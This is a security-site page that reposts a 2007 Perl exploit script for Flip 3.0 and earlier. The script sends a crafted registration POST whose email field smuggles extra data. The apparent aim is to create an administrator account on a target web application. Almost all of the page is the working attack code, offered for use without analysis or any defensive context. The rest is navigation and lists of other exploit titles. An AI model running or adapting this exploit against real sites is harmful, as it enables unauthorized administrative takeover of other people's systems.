首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Flip <= 3.0 Remoe Admin Creation Exploit
来源:www.vfocus.net 作者:vfocus 发布时间:2007-09-20  
#!/usr/bin/perl

use strict;
use IO::Socket;
use Getopt::Std;

my $app = "Flip <= 3.0";
my $type = "Admin Creation";
my $author = "undefined1_";
my $vendor = "http://sourceforge.net/projects/flipsource";

my %opt;
getopts("t:", \%opt);
$| = 1;
print ":: $app $type - by $author - www.undef1.com ::\n\n\n";

my $url = $opt{t} || usage();

if($url =~ m/^(?:http:\/\/)(.*)/) {
$url = $1;
}
if($url !~ m/^.*\/$/) {
$url .= "/";
}

print "username you want: ";
my $user = <STDIN>;
print "password you want: ";
my $pass = <STDIN>;
chomp($user);
chomp($pass);

create_admin($url, $user, $pass);

sub create_admin {
my $url = shift;
my $user = shift;
my $pass = shift;

print "creating admin ... \t";
my $content  = "un=$user&em=aaa][3\@gmail.com&pw1=$pass&pw2=$pass";
my $data = "POST " . parse_page($url . "account.php?op=register") . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Connection: close\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: " . length($content) . "\r\n\r\n";
my $recv = sendpacket(parse_host($url), parse_port($url), $data.$content);

if($recv !~ m/Successfully registered!/m) {
print "failed\n";
return;
}
print "OK\n";
}



# ======================================================

sub parse_host {
my $url = shift;
if($url =~ m/^([^\/:]+).*\//) {
return $1;
}
return "127.0.0.1";
}

sub parse_port {
my $url = shift;
if($url =~ m/^(?:[^\/:]+):(\d+)\//) {
return $1;
}
return "80";
}

sub parse_page {
my $url = shift;
if($url =~ m/^(?:[^\/]+)(\/.*)/) {
return $1;
}
return "/";
}


sub sendpacket {
my $server = shift;
my $port = shift;
my $data = shift;

my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die ":: Could not connect to $server:80 $!\n";
print $sock "$data";

$data = "";
my $resp;
while($resp = <$sock>) { $data .= $resp; }

close($sock);
return $data;
}

sub usage() {
printf "usage: %s -t<url>\n", $0;
exit;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OneCMS 2.4 (userreviews.php ab
·Flip <= 3.0 Remote Password Ha
·Sun jre1.6.0_X isInstalled.dns
·IMail iaspam.dll 8.0x Remote H
·Microsoft Visual Basic Enterpr
·Lighttpd <= 1.4.17 FastCGI Hea
·>Mercury/32 4.52 IMAPD SEARCH
·EasyMail MessagePrinter Object
·Yahoo! Messenger 8.1.0.421 CYF
·Xitami Web Server 2.5 (If-Modi
·jetAudio 7.x ActiveX DownloadF
·AskJeeves Toolbar 4.0.2.53 act
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved